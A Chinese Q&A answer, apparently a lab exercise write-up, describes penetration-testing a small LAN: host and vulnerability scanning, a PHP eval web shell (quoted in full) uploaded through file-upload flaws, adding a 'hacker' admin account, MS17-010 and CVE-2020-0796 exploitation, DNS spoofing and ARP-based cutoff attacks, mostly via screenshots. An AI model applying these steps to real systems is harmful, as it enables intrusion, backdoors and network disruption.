不喜丶不悲

如何对局域网进行渗透测试

分享
  • Simon 2 风险管理(专业级)RM/PL CICSA
    Simon2 风险管理(专业级)RM/PL CICSA

    一、信息收集

    1.实验拓扑

    图片

    2.通过信息收集完成对DMZ内部主机进行发现是否在线,完成包括端口、服务、系统类型信息扫描

    (1)使用Kali linux自带工具netdiscover可以针对特定子网进行多主机扫描,查看网段主机的存活情况,发现除本地主机以外的其他目标主机的信息。

    图片

    发现扫描出来的的主机有5台,除了真机和网关地址外有目标主机两台,以下争对两台目标主机进行信息的收集。

    (2)采用nmap去查看两台存活主机的版本信息和端口信息

    1)主机ip为192.168.1.135 操作系统为Windows2012,开放端口为80端口

    图片

    2)主机ip为192.168.1.136 操作系统为Ubuntu,开放端口为22,8080端口

    图片

    3.通过企业漏扫工具进行漏洞扫描,其中需要发现办公网及DMZ中所有主机的漏洞情况

    (1)使用nessus漏洞扫描工具对Ubuntu机进行漏洞扫描

    图片

    2)创建扫描对象

    图片

    3)选择查询漏洞的范围,根据前面查询出来的端口这里选择查询webservice的漏洞

    图片

    4)保存完成之后开始扫描

    图片

    5)扫描完成之后查看结果

    图片

    由于以下部分的漏洞扫描的步骤有些一样,接下来只展示漏洞扫描完成结果图

    (2)使用nessus漏洞扫描工具对Windows2012主机进行漏洞扫描

    图片

    (3)使用nessus漏洞扫描工具对Windows7主机进行漏洞扫描发现Windows7存在多个漏洞

    图片

    (4)使用nessus漏洞扫描工具对Windows10主机进行漏洞扫描,存在smb漏洞

    图片

    二、攻击渗透

    1.利用Linux-server开放的服务,以文件上传漏洞方式,拿下主机操作系统

    1)通过前面扫描的ubuntu主机发现存在漏洞,通过测试发现存在文件上传网页

    图片

    2)接下来采用PHP挂马方式,进行漏洞提权,用记事本创建一个a.php文件。内容如下,其中pass为密码

    <?php @eval($_POST[‘pass’])?>

    图片

    3)打开网站的文件上传页面,进行文件的上传

    图片

    4)可以看到文件上传成功

    图片

    5)打开中国菜刀进行连接

    图片

    6)获取shell

    图片

    2.利用Windows-server开放的服务,以文件上传漏洞方式,拿下主机操作系统

    2)接下来采用PHP挂马方式,进行漏洞提权,用记事本创建一个a.php文件。内容如下,其中pass为密码

    图片

    3)修改系统参数,允许上传PHP文件

    图片

    4)到用户中心,选择发送信息上传PHP文件

    图片

    5)拷贝连接,在浏览器打开,查看文件上传情况

    图片

    由于没有填写内容,打开文件为空白的,但是文件已经上传成功了

    图片

    7)获取权限成功

    图片

    3.以第”2”提为前提,通过新建”hacker”用户远程登陆到Windows-server桌面,具有超管权限。
    (请截取重要的步骤图且详细说明过程)

    图片

    2)创建hacker用户

    图片

    3)把新建的用户提权为管理员用户

    图片

    4)执行远程连接

    图片

    4.利用kali-Linux入侵Windows7,获取远程执行shell,再利用Windows7进行CVE2020-0796扫描整个办公网,发现Windows10漏洞。(10分)

    图片

    1)通过前面的漏洞扫描得出存在ms17-010漏洞,使用kali执行攻击模块攻击改漏洞

    图片

    2)使用exploit模块进行漏洞攻击

    图片

    图片

    3)攻击成功,获取到shell

    图片

    4)上传CVE2020-0796漏洞扫描工具到windows7上面

    图片

    5)在Windows7查看文件是否上传成功

    图片

    6)执行漏洞扫描工具扫描Windows10

    图片

    检查到Windows10存在漏洞

    1)生成py文件

    图片

    2)找到exploit.py,将123.py内的”buf”全部替换成”USER_PAYLOAD”。

    图片

    3)再将123.py内的所有内容拷贝覆盖掉exploit.py内的所有关于”USER_PAYLOAD”的内容。

    图片

    4)执行exploit问价

    图片

    5)开始执行攻击

    图片

    6)攻击成功,获取shell

    图片

    6.完成Windows7的DNS劫持,让其访问Windows-server任意一个网站
    (请截取重要的步骤图且详细说明过程)

    图片

    2)开启kali的http功能

    图片

    3)开启ettercap工具

    图片

    4)开启嗅探点击右上角√启动后,点击左上角放大镜图标,开始嗅探。

    图片

    5)查看嗅探到的ip

    图片

    将windows7靶机地址设为目标1,网关地址设为目标2

    7)点击右上角选单,plugins 找到dns_spoof(dns欺骗),双击启用。

    图片

    8)windows7主机访问任何页面都会跳转到web-seervice 的网站。

    图片

    7.当Windows7访问Windows-server任意网站时出现的弹窗。

    图片

    图片

    8.Windows10、Windows7完成断网攻击

    1)测试Windows10和7是否能正常通信

    图片

    图片

    2)安装嗅探工具dsniff

    图片

    3)前往目录cd /proc/sys/net/ipv4/编辑ip_forward文件(修改为1则转发数据,0则不转发)

    图片

    4)进行arp攻击

    图片

    Windows10

    图片

    5)查看Windows10和Windows7的上网情况

    图片

    图片

  • 写回答